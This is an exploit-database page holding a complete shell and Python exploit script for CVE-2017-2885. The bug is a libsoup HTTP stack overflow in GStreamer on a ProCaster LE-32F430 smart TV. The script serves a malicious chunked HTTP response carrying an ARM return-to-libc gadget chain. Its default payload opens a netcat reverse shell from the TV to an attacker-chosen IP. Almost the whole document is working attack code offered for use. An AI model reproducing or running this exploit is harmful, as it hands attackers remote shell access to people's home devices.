Exploit for ProCaster LE-32F430 GStreamer souphttpsrc libsoup/2.51.3 Stack Overflow CVE-2017-2885

Name: Exploit for ProCaster LE-32F430 GStreamer souphttpsrc libsoup/2.51.3 Stack Overflow CVE-2017-2885
Rating: 5 (582 reviews)
2020-12-07 | CVSS 7.5
## https://sploitus.com/exploit?id=PACKETSTORM:160388
#!/bin/sh  
# ProCaster LE-32F430 (NotSo)SmartTV remote code execution exploit through  
# GStreamer souphttpsrc libsoup/2.51.3 HTTP stack overflow (CVE-2017-2885)  
# ~ def <def@huumeet.info> 2020-02-15 ................. 850day exploit lol  
  
# Exploit payload: ret2libc system() nc reverse shell with a clean exit()  
CMD="${CMD:-/bin/busybox nc ${IP:-192.168.1.100} ${PORT:-54321} -e /bin/sh}"  
  
case "${1:-${ACTION:-httpd}}" in # By default, start socat-based exploit server  
httpd)  
# Check dependencies  
for PROGRAM in socat python3 dd wc; do  
if ! command -v "$PROGRAM" >/dev/null; then  
printf "Missing dependency: %s\n" "$PROGRAM"  
exit 1  
fi  
done  
  
# Parse bind address and port  
case "${ARG=${2:-${HTTPD_BIND:-0.0.0.0:12345}}}" in  
*:*) HTTPD_ADDR="${ARG%:*}"; HTTPD_PORT="${ARG#*:}" ;;  
*) printf "Bad httpd [IPv4:PORT] bind arg: %s\n" "$ARG"; exit 1 ;;  
esac >&2  
  
# Start socat HTTP server  
printf "HTTP souploit.sh server @ %s:%d\n" "$HTTPD_ADDR" "$HTTPD_PORT"  
printf "Exploit system() payload: %s\n" "$CMD"  
exec socat -v -x \  
TCP-LISTEN:"$HTTPD_PORT,reuseaddr,fork,bind=$HTTPD_ADDR" \  
EXEC:"\\'$0\\' request"  
;;  
  
-h|--help|help) printf "Usage: %s httpd [IPv4:PORT]\n" "$0"; exit 0 ;;  
  
request) set -e ;;  
  
*) printf "Unsupported %s action: '%s'\n" "$0" "$1" >&2; exit 1 ;;  
esac  
  
# GStreamer souphttpsrc dislikes fragmented HTTP responses (so buffer them)  
flush_stdout() {  
exec 1>&3 3>&-  
dd if=/tmp/$$.stdout bs="$(wc -c </tmp/$$.stdout)" count=1 2>/dev/null  
rm -f /tmp/$$.stdout  
}  
exec 3>&1 1>/tmp/$$.stdout  
trap flush_stdout EXIT  
  
# Parse HTTP request  
IFS="$(printf '\t\r\n ')"  
TIME="$(date '+%Y-%m-%d %H:%M:%S%z')"  
if read -r METHOD URL HTTP && [ -n "$METHOD" -a -n "$URL" -a -n "$HTTP" ]; then  
printf "[%s] %s %s %s\n" "$TIME" "$METHOD" "$URL" "$HTTP" >&2  
while IFS="$IFS:" read -r KEY VALUE && [ -n "$KEY" -a -n "$VALUE" ]  
do printf "[%s] %s: %s\n" "$TIME" "$KEY" "$VALUE"; done >&2  
else  
printf "[%s] '%s' '%s' '%s'\n" "$TIME" "$METHOD" "$URL" "$HTTP" >&2  
printf "HTTP/1.1 400 Bad Request\r\n"  
printf "Date: %s\r\n" "$(TZ=GMT date '+%a, %d %b %Y %T %Z')"  
printf "Content-Length: 0\r\n"  
printf "Connection: close\r\n"  
printf "\r\n"  
exit 0  
fi  
  
# Handle HTTP HEAD and GET  
if [ "$METHOD" = "HEAD" ]; then  
printf "HTTP/1.1 200 OK\r\n"  
printf "Date: %s\r\n" "$(TZ=GMT date '+%a, %d %b %Y %T %Z')"  
printf "Content-Type: %s\r\n" "${MIME:-"video/mp4"}"  
printf "Content-Length: %d\r\n" "12345"  
printf "Accept-Ranges: bytes\r\n"  
printf "Connection: close\r\n"  
printf "\r\n"  
exit 0  
elif [ "$METHOD" != "GET" ]; then  
printf "HTTP/1.1 405 Not Allowed\r\n"  
printf "Date: %s\r\n" "$(TZ=GMT date '+%a, %d %b %Y %T %Z')"  
printf "Content-Length: 0\r\n"  
printf "Connection: close\r\n"  
printf "\r\n"  
exit 0  
fi  
  
# Exploit payload  
python3 -u - "$CMD" <<"EOF"  
import sys, struct  
command = sys.argv[1].encode() + b'\x00'  
if len(command) > 108: raise Exception("Command length exceeds limit 108")  
LE32, BE32 = lambda v: struct.pack('<I', v), lambda v: struct.pack('>I', v)  
sys.stdout.buffer.write(b"".join([  
#####################################  
b"HTTP/1.1 206 OK\r\n", #  
b"Transfer-Encoding: chunked\r\n", #  
b"Connection: close\r\n", #  
b"\r\n", #  
#####################################  
b"1\r\n", # start a chunk #  
b">", # 4B alignment #  
#####################################  
LE32(0xAAAAAAAA), # padding #  
LE32(0xBBBBBBBB), # padding #  
LE32(0xCCCCCCCC), # padding #  
#####################################  
LE32(0x477B9C49), # (9) sym.exit  
command.ljust(108), # system() command  
LE32(0x4783A1E3), # (4) pc = add sp, 0x64; pop.w {r4, ..., r11, pc}  
LE32(0x4784A7C7), # (7) r4 = ldr lr, [sp], 4; bx r3; bx lr  
LE32(0x4783D287), # (2) r4 = mov r0, sp; blx r3  
#####################################  
BE32(0x01234567), # padding #  
BE32(0x89ABCDEF), # padding #  
#####################################  
LE32(0x477C01E5), # (8) r8 = sym.system  
LE32(0x477CF019), # (3) r8 = add sp, 0x6C; ldr pc, [sp], 4  
LE32(0x478436F7), # (6) r10 = mov r3, r8; blx r4  
LE32(0x478436F7), # (1) r10 = mov r3, r8; blx r4  
LE32(0x477927A3), # (5) pc = sub sp, 0x98; bx r10  
LE32(0x477927A3), # (0) pc = sub sp, 0x98; bx r10  
#####################################  
LE32(0x4787BB08), # valid pointer #  
LE32(0x4787BB08), # valid pointer #  
#####################################  
b"\r\n" # payload EOF # 248B  
#####################################  
]))  
EOF